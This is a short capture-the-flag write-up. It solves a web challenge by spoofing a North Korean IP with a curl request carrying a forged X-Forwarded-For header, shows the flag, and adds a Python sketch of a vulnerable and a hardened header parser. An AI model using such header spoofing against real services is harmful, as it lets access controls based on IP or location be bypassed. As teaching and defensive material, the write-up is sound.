Fake an originating IP address from North Korea using the X-Forwarded-For header.

Solution

Pretty easy challenge. We need to fake our originating IP address to the site using the X-Forwarded-For header. Obviously, we should use an IP address within the North Korean range.

amon@Evanna:~/ctf/ctfx/web/northkorea$ curl 'http://problems.ctfx.io:7002/code'  \
-H 'DNT: 1' -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Languq=0.8,en-GB;q=0.6' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' \
-H 'Accept: */*' -H 'Referer: http://problems.ctfx.io:7002/' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Connection: keep-alive' --compressed -H 'X-Forwarded-For: 175.45.177.0'
ctf(jk_we_aint_got_n0_nuk35)

Flag: ctf(jk_we_aint_got_n0_nuk35)
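
The defensive side of this, as an added example that is not part of the original write-up or the challenge's source: a geo check that believes the left-most X-Forwarded-For entry, next to one that only accepts header hops vouched for by its own reverse proxies. The function names, the 10.0.0.0/8 proxy network and the 175.45.176.0/22 range are assumptions made for this sketch.

```python
import ipaddress

# Assumptions for this sketch: the reverse proxies the app sits behind, and
# the range the check treats as North Korean (the solve used 175.45.177.0).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_RANGE = ipaddress.ip_network("175.45.176.0/22")


def naive_client_ip(peer_ip, xff):
    """Vulnerable: believes the left-most X-Forwarded-For entry from anyone."""
    if xff:
        return xff.split(",")[0].strip()
    return peer_ip


def _is_trusted(ip):
    return any(ip in net for net in TRUSTED_PROXIES)


def hardened_client_ip(peer_ip, xff):
    """Walk the hop chain right to left, stopping at the first hop that is
    not one of our proxies. Header content is only considered when the TCP
    peer itself is a trusted proxy."""
    current = ipaddress.ip_address(peer_ip)
    hops = [h.strip() for h in xff.split(",")] if xff else []
    while _is_trusted(current) and hops:
        try:
            current = ipaddress.ip_address(hops.pop())
        except ValueError:
            break  # malformed entry: stop at the last address we could verify
    return str(current)


def in_allowed_range(ip):
    """Range check applied to whichever address the server decided to believe."""
    return ipaddress.ip_address(ip) in ALLOWED_RANGE
```

With the hardened version, a header sent straight from a client is ignored, and a value the client planted ahead of the proxy's own entry never reaches the range check.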
